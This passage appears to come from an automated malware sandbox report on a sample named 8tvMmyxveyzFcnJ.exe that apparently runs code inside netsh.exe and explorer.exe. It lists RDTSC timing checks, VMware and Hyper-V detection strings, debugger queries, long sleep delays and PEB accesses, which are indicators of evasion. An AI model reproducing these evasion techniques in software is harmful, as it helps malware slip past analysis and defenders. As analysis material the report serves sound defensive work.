          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 4B30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 7860000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 8860000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 8A10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 9A10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8472Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1473Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 860Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 9843Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-13832
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI coverage: 1.8 %
          Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.4 %
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5064Thread sleep count: 8472 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5064Thread sleep time: -16944000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5064Thread sleep count: 1473 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5064Thread sleep time: -2946000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7100Thread sleep count: 128 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7100Thread sleep time: -256000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7100Thread sleep count: 9843 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7100Thread sleep time: -19686000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: explorer.exe, 00000004.00000000.1706307837.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000000.1703761960.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000004.00000002.4146493757.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000004.00000000.1706307837.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000004.00000003.3108324353.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000004.00000002.4146493757.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3114554074.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000003.3108324353.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000004.00000000.1705502686.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01444144 mov eax, dword ptr fs:[00000030h]3_2_01444144
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01444144 mov ecx, dword ptr fs:[00000030h]3_2_01444144
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01443140 mov eax, dword ptr fs:[00000030h]3_2_01443140
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B1131 mov eax, dword ptr fs:[00000030h]3_2_013B1131
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB136 mov eax, dword ptr fs:[00000030h]3_2_013AB136
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485152 mov eax, dword ptr fs:[00000030h]3_2_01485152
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E0124 mov eax, dword ptr fs:[00000030h]3_2_013E0124
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01448158 mov eax, dword ptr fs:[00000030h]3_2_01448158
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01449179 mov eax, dword ptr fs:[00000030h]3_2_01449179
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01470115 mov eax, dword ptr fs:[00000030h]3_2_01470115
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145A118 mov ecx, dword ptr fs:[00000030h]3_2_0145A118
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145A118 mov eax, dword ptr fs:[00000030h]3_2_0145A118
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B7152 mov eax, dword ptr fs:[00000030h]3_2_013B7152
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC156 mov eax, dword ptr fs:[00000030h]3_2_013AC156
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B6154 mov eax, dword ptr fs:[00000030h]3_2_013B6154
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9148 mov eax, dword ptr fs:[00000030h]3_2_013A9148
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014851CB mov eax, dword ptr fs:[00000030h]3_2_014851CB
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014761C3 mov eax, dword ptr fs:[00000030h]3_2_014761C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CB1B0 mov eax, dword ptr fs:[00000030h]3_2_013CB1B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142E1D0 mov eax, dword ptr fs:[00000030h]3_2_0142E1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0142E1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA197 mov eax, dword ptr fs:[00000030h]3_2_013AA197
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014861E5 mov eax, dword ptr fs:[00000030h]3_2_014861E5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F0185 mov eax, dword ptr fs:[00000030h]3_2_013F0185
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014571F9 mov esi, dword ptr fs:[00000030h]3_2_014571F9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E01F8 mov eax, dword ptr fs:[00000030h]3_2_013E01F8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146C188 mov eax, dword ptr fs:[00000030h]3_2_0146C188
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01407190 mov eax, dword ptr fs:[00000030h]3_2_01407190
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B51ED mov eax, dword ptr fs:[00000030h]3_2_013B51ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143019F mov eax, dword ptr fs:[00000030h]3_2_0143019F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014611A4 mov eax, dword ptr fs:[00000030h]3_2_014611A4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013ED1D0 mov eax, dword ptr fs:[00000030h]3_2_013ED1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013ED1D0 mov ecx, dword ptr fs:[00000030h]3_2_013ED1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01436050 mov eax, dword ptr fs:[00000030h]3_2_01436050
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA020 mov eax, dword ptr fs:[00000030h]3_2_013AA020
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC020 mov eax, dword ptr fs:[00000030h]3_2_013AC020
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145705E mov ebx, dword ptr fs:[00000030h]3_2_0145705E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145705E mov eax, dword ptr fs:[00000030h]3_2_0145705E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485060 mov eax, dword ptr fs:[00000030h]3_2_01485060
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE016 mov eax, dword ptr fs:[00000030h]3_2_013CE016
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143106E mov eax, dword ptr fs:[00000030h]3_2_0143106E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D070 mov ecx, dword ptr fs:[00000030h]3_2_0142D070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01434000 mov ecx, dword ptr fs:[00000030h]3_2_01434000
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov ecx, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DC073 mov eax, dword ptr fs:[00000030h]3_2_013DC073
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B2050 mov eax, dword ptr fs:[00000030h]3_2_013B2050
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB052 mov eax, dword ptr fs:[00000030h]3_2_013DB052
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01446030 mov eax, dword ptr fs:[00000030h]3_2_01446030
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147903E mov eax, dword ptr fs:[00000030h]3_2_0147903E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D0C0 mov eax, dword ptr fs:[00000030h]3_2_0142D0C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D0C0 mov eax, dword ptr fs:[00000030h]3_2_0142D0C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014850D9 mov eax, dword ptr fs:[00000030h]3_2_014850D9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014320DE mov eax, dword ptr fs:[00000030h]3_2_014320DE
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E909C mov eax, dword ptr fs:[00000030h]3_2_013E909C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014360E0 mov eax, dword ptr fs:[00000030h]3_2_014360E0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B5096 mov eax, dword ptr fs:[00000030h]3_2_013B5096
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DD090 mov eax, dword ptr fs:[00000030h]3_2_013DD090
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DD090 mov eax, dword ptr fs:[00000030h]3_2_013DD090
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B208A mov eax, dword ptr fs:[00000030h]3_2_013B208A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AD08D mov eax, dword ptr fs:[00000030h]3_2_013AD08D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143D080 mov eax, dword ptr fs:[00000030h]3_2_0143D080
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143D080 mov eax, dword ptr fs:[00000030h]3_2_0143D080
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC0F0 mov eax, dword ptr fs:[00000030h]3_2_013AC0F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F20F0 mov ecx, dword ptr fs:[00000030h]3_2_013F20F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B80E9 mov eax, dword ptr fs:[00000030h]3_2_013B80E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D50E4 mov eax, dword ptr fs:[00000030h]3_2_013D50E4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D50E4 mov ecx, dword ptr fs:[00000030h]3_2_013D50E4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA0E3 mov ecx, dword ptr fs:[00000030h]3_2_013AA0E3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D90DB mov eax, dword ptr fs:[00000030h]3_2_013D90DB
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014480A8 mov eax, dword ptr fs:[00000030h]3_2_014480A8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov ecx, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov ecx, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov ecx, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov ecx, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014760B8 mov eax, dword ptr fs:[00000030h]3_2_014760B8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014760B8 mov ecx, dword ptr fs:[00000030h]3_2_014760B8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485341 mov eax, dword ptr fs:[00000030h]3_2_01485341
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A7330 mov eax, dword ptr fs:[00000030h]3_2_013A7330
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147A352 mov eax, dword ptr fs:[00000030h]3_2_0147A352
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF32A mov eax, dword ptr fs:[00000030h]3_2_013DF32A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov ecx, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F367 mov eax, dword ptr fs:[00000030h]3_2_0146F367
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC310 mov ecx, dword ptr fs:[00000030h]3_2_013AC310
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D0310 mov ecx, dword ptr fs:[00000030h]3_2_013D0310
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EA30B mov eax, dword ptr fs:[00000030h]3_2_013EA30B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EA30B mov eax, dword ptr fs:[00000030h]3_2_013EA30B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EA30B mov eax, dword ptr fs:[00000030h]3_2_013EA30B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145437C mov eax, dword ptr fs:[00000030h]3_2_0145437C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143930B mov eax, dword ptr fs:[00000030h]3_2_0143930B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143930B mov eax, dword ptr fs:[00000030h]3_2_0143930B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143930B mov eax, dword ptr fs:[00000030h]3_2_0143930B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B7370 mov eax, dword ptr fs:[00000030h]3_2_013B7370
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B7370 mov eax, dword ptr fs:[00000030h]3_2_013B7370
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B7370 mov eax, dword ptr fs:[00000030h]3_2_013B7370
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9353 mov eax, dword ptr fs:[00000030h]3_2_013A9353
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9353 mov eax, dword ptr fs:[00000030h]3_2_013A9353
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147132D mov eax, dword ptr fs:[00000030h]3_2_0147132D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147132D mov eax, dword ptr fs:[00000030h]3_2_0147132D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AD34C mov eax, dword ptr fs:[00000030h]3_2_013AD34C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AD34C mov eax, dword ptr fs:[00000030h]3_2_013AD34C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014363C0 mov eax, dword ptr fs:[00000030h]3_2_014363C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146C3CD mov eax, dword ptr fs:[00000030h]3_2_0146C3CD
